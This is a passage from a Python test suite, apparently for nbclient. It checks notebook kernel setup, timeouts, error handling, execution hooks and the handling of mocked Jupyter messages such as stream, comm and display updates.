delta = datetime.timedelta(milliseconds=100)
assert status_busy - cell_start < delta
assert execute_input - cell_start < delta
assert execute_reply - cell_end < delta
assert status_idle - cell_end < delta
def test_synchronous_setup_kernel():
nb = nbformat.v4.new_notebook()
executor = NotebookClient(nb)
with executor.setup_kernel():
# Prove it initialized client
assert executor.kc is not None
# Prove it removed the client (and hopefully cleaned up)
assert executor.kc is None
def test_startnewkernel_with_kernelmanager():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
executor.start_new_kernel()
kc = executor.start_new_kernel_client()
# prove it initialized client
assert kc is not None
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
def test_start_new_kernel_history_file_setting():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
kc = km.client()
# Should start empty
assert executor.extra_arguments == []
# Should assign memory setting for ipykernel
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# Should not add a second hist_file assignment
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
class TestExecute(NBClientTestsBase):
"""Contains test functions for execute.py"""
maxDiff = None
def test_constructor(self):
NotebookClient({})
def test_populate_language_info(self):
nb = nbformat.v4.new_notebook() # Certainly has no language_info.
executor = NotebookClient(nb, kernel_name="python")
nb = executor.execute()
assert 'language_info' in nb.metadata
def test_empty_path(self):
"""Can the kernel be started when the path is empty?"""
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
res = self.build_resources()
res['metadata']['path'] = ''
input_nb, output_nb = run_notebook(filename, {}, res)
assert_notebooks_equal(input_nb, output_nb)
@pytest.mark.xfail(
"python3" not in KernelSpecManager().find_kernel_specs(),
reason="requires a python3 kernelspec",
)
def test_empty_kernel_name(self):
"""Can kernel in nb metadata be found when an empty string is passed?
Note: this pattern should be discouraged in practice.
Passing in no kernel_name to NotebookClient is recommended instead.
"""
filename = os.path.join(current_dir, 'files', 'UnicodePy3.ipynb')
res = self.build_resources()
input_nb, output_nb = run_notebook(filename, {"kernel_name": ""}, res)
assert_notebooks_equal(input_nb, output_nb)
with pytest.raises(TraitError):
input_nb, output_nb = run_notebook(filename, {"kernel_name": None}, res)
def test_disable_stdin(self):
"""Test disabling standard input"""
filename = os.path.join(current_dir, 'files', 'Disable Stdin.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
input_nb, output_nb = run_notebook(filename, dict(allow_errors=True), res)
# We need to special-case this particular notebook, because the
# traceback contains machine-specific stuff like where IPython
# is installed. It is sufficient here to just check that an error
# was thrown, and that it was a StdinNotImplementedError
self.assertEqual(len(output_nb['cells']), 1)
self.assertEqual(len(output_nb['cells'][0]['outputs']), 1)
output = output_nb['cells'][0]['outputs'][0]
self.assertEqual(output['output_type'], 'error')
self.assertEqual(output['ename'], 'StdinNotImplementedError')
self.assertEqual(
output['evalue'],
'raw_input was called, but this frontend does not support input requests.',
)
def test_timeout(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(TimeoutError) as err:
run_notebook(filename, dict(timeout=1), res)
self.assertEqual(
str(err.value.args[0]),
"""A cell timed out while it was being executed, after 1 seconds.
The message was: Cell execution timed out.
Here is a preview of the cell contents:
-------------------
while True: continue
-------------------
""",
)
def test_timeout_func(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
def timeout_func(source):
return 10
with pytest.raises(TimeoutError):
run_notebook(filename, dict(timeout_func=timeout_func), res)
def test_kernel_death_after_timeout(self):
"""Check that an error is raised when the kernel is_alive is false after a cell timed out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
executor = NotebookClient(input_nb, timeout=1)
with pytest.raises(TimeoutError):
executor.execute()
km = executor.create_kernel_manager()
async def is_alive():
return False
km.is_alive = is_alive
# Will be a RuntimeError or subclass DeadKernelError depending
# on if jupyter_client or nbconvert catches the dead client first
with pytest.raises(RuntimeError):
input_nb, output_nb = executor.execute()
def test_kernel_death_during_execution(self):
"""Check that an error is raised when the kernel is_alive is false during a cell
execution.
"""
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(input_nb)
with pytest.raises(RuntimeError):
executor.execute()
def test_allow_errors(self):
"""
Check that conversion halts if ``allow_errors`` is False.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(allow_errors=False), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_force_raise_errors(self):
"""
Check that conversion halts if the ``force_raise_errors`` traitlet on
NotebookClient is set to True.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions with Cell Tags.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(force_raise_errors=True), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_reset_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, a new one must have been created
kc = executor.kc
assert kc is not None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, the previously created one must have been reused
assert kc == executor.kc
executor.execute(reset_kc=True, cleanup_kc=False)
# we asked to reset the kernel client, the previous one must have been cleaned up,
# a new one must have been created
assert kc != executor.kc
def test_cleanup_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute()
# we asked to cleanup the kernel client (default is True)
assert executor.kc is None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client
# a new one must have been created and should still be available
assert executor.kc is not None
def test_custom_kernel_manager(self):
from .fake_kernelmanager import FakeCustomKernelManager
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
executor = NotebookClient(
cleaned_input_nb,
resources=self.build_resources(),
kernel_manager_class=FakeCustomKernelManager,
)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
executor.execute()
expected = FakeCustomKernelManager.expected_methods.items()
for method, call_count in expected:
            self.assertNotEqual(call_count, 0, f'{method} was never called')
def test_process_message_wrapper(self):
outputs = []
class WrappedPreProc(NotebookClient):
def process_message(self, msg, cell, cell_index):
result = super().process_message(msg, cell, cell_index)
if result:
outputs.append(result)
return result
current_dir = os.path.dirname(__file__)
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
wpp = WrappedPreProc(input_nb)
executed = wpp.execute()
assert outputs == [{'name': 'stdout', 'output_type': 'stream', 'text': 'Hello World\n'}]
assert_notebooks_equal(original, executed)
def test_execute_function(self):
# Test the execute() convenience API
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
executed = execute(original, os.path.dirname(filename))
assert_notebooks_equal(original, executed)
def test_widgets(self):
"""Runs a test notebook with widgets and checks the widget state is saved."""
input_file = os.path.join(current_dir, 'files', 'JupyterWidgets.ipynb')
opts = dict(kernel_name="python")
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(input_file)
input_nb, output_nb = run_notebook(input_file, opts, res)
output_data = [
output.get('data', {}) for cell in output_nb['cells'] for output in cell['outputs']
]
model_ids = [
data['application/vnd.jupyter.widget-view+json']['model_id']
for data in output_data
if 'application/vnd.jupyter.widget-view+json' in data
]
wdata = output_nb['metadata']['widgets']['application/vnd.jupyter.widget-state+json']
for k in model_ids:
d = wdata['state'][k]
assert 'model_name' in d
assert 'model_module' in d
assert 'state' in d
assert 'version_major' in wdata
assert 'version_minor' in wdata
def test_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:6]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_execution_hook_error(self):
filename = os.path.join(current_dir, 'files', 'Error.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(CellExecutionError):
executor.execute()
for hook in hooks[:5]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_notebook_hook(self):
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(RuntimeError):
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:]:
hook.assert_called_once()
def test_async_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [AsyncMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:6]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_async_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'Error.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [AsyncMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(CellExecutionError):
            executor.execute()
for hook in hooks[:5]:
hook.assert_called_once()
hooks[6].assert_not_called()
class TestRunCell(NBClientTestsBase):
"""Contains test functions for NotebookClient.execute_cell"""
@prepare_cell_mocks()
def test_idle_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# Just the exit message should be fetched
assert message_mock.call_count == 1
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'parent_header': {'msg_id': 'wrong_parent'},
'content': {'name': 'stdout', 'text': 'foo'},
}
)
def test_message_for_wrong_parent(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An ignored stream followed by an idle
assert message_mock.call_count == 2
# Ensure no output was written
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'status',
'header': {'msg_type': 'status'},
'content': {'execution_state': 'busy'},
}
)
def test_busy_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One busy message, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_deadline_exec_reply(self, executor, cell_mock, message_mock):
# exec_reply is never received, so we expect to hit the timeout.
async def get_msg(timeout):
await asyncio.sleep(timeout)
raise Empty
executor.kc.shell_channel.get_msg = get_msg
executor.timeout = 1
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks()
def test_deadline_iopub(self, executor, cell_mock, message_mock):
# The shell_channel will complete, so we expect only to hit the iopub timeout.
message_mock.side_effect = Empty()
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_eventual_deadline_iopub(self, executor, cell_mock, message_mock):
# Process a few messages before raising a timeout from iopub
def message_seq(messages):
yield from messages
while True:
yield Empty()
message_mock.side_effect = message_seq(list(message_mock.side_effect)[:-1])
executor.kc.shell_channel.get_msg = Mock(
return_value=make_async({'parent_header': {'msg_id': executor.parent_id}})
)
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count >= 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{'msg_type': 'execute_input', 'header': {'msg_type': 'execute_input'}, 'content': {}}
)
def test_execute_input_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One ignored execute_input, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_stream_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout then stderr stream followed by an idle
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {}},
)
def test_clear_output_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Ensure the output was cleared
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
)
def test_clear_output_wait_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Should be true without another message to trigger the clear
self.assertTrue(executor.clear_before_next_output)
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_clear_output_wait_then_message_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert not executor.clear_before_next_output
# The earlier stdout output was cleared and replaced by the stderr output
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
},
)
def test_clear_output_wait_then_update_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stdout stream, followed by a wait clear, an update_display_data, and then an idle
assert message_mock.call_count == 4
# Should still be true because update_display_data does not produce a new output
assert executor.clear_before_next_output
# Ensure the output wasn't cleared yet because update_display doesn't add outputs
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
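# ------------------------------------------------------------------
# Hedged aside (not part of the original test suite): the 'clear_output'
# messages mocked in the tests above are what a kernel publishes when
# notebook code calls IPython.display.clear_output().  A minimal sketch,
# assuming IPython is installed and the snippet runs inside a notebook cell:
#
#     from IPython.display import clear_output
#     print("first output")
#     clear_output(wait=True)   # with wait=True the old output survives ...
#     print("second output")    # ... until this next output replaces it
# ------------------------------------------------------------------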
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message_ignored_on_override(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0, execution_count=21)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 21
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'execution_count': 42, 'name': 'stdout', 'text': 'foo'},
}
)
def test_execution_count_with_stream_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should also consume the message stream
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}}},
}
)
def test_widget_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message without buffer info followed by an idle
assert message_mock.call_count == 2
self.assertEqual(executor.widget_state, {'foobar': {'foo': 'bar'}})
# Buffers should still be empty
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
}
)
def test_widget_comm_buffer_message_single(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 2
assert executor.widget_state == {'foobar': {'foo': 'bar'}}
assert executor.widget_buffers == {
'foobar': {('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
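# ------------------------------------------------------------------
# Hedged aside (not part of the original test suite): the expected buffer
# value 'MTIz' above is simply the base64 encoding of the raw comm buffer
# b'123'.  A minimal, standard-library-only check:
#
#     import base64
#     assert base64.b64encode(b'123').decode('ascii') == 'MTIz'
# ------------------------------------------------------------------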
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
},
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo2': 'bar2'}, 'buffer_paths': [['path2']]},
},
},
)
def test_widget_comm_buffer_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# Two comm messages with buffer info followed by an idle
assert message_mock.call_count == 3
assert executor.widget_state == {'foobar': {'foo': 'bar', 'foo2': 'bar2'}}
assert executor.widget_buffers == {
'foobar': {
('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']},
('path2',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path2']},
}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {
'comm_id': 'foobar',
# No 'state'
'data': {'foo': 'bar'},
},
}
)
def test_unknown_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An unknown comm message followed by an idle
assert message_mock.call_count == 2
# Widget states should be empty as the message has the wrong shape
assert not executor.widget_state
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_with_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
}
)
def test_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar_other'},
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_display_data_same_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# Three displays followed by an idle
assert message_mock.call_count == 4
# Outputs sharing the display id show the latest data; the middle output is untouched
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_update_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 2
# Display updates don't create any outputs
assert cell_mock.outputs == []
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar2'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_mismatch_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display, followed by an update for a different id, and then an idle
assert message_mock.call_count == 3
# The update targets a different display id, so the original output is unchanged
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an update then an idle
assert message_mock.call_count == 3
# Original output should be manipulated
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
}
)
def test_error_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_and_error_status_messages(self, executor, cell_mock, message_mock):
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Cell outputs should still be copied
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# OK
'content': {'status': 'ok'},
},
)
def test_error_message_only(self, executor, cell_mock, message_mock):
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_allow_errors(self, executor, cell_mock, message_mock):
executor.allow_errors = True
# Should NOT raise
executor.execute_cell(cell_mock, 0)
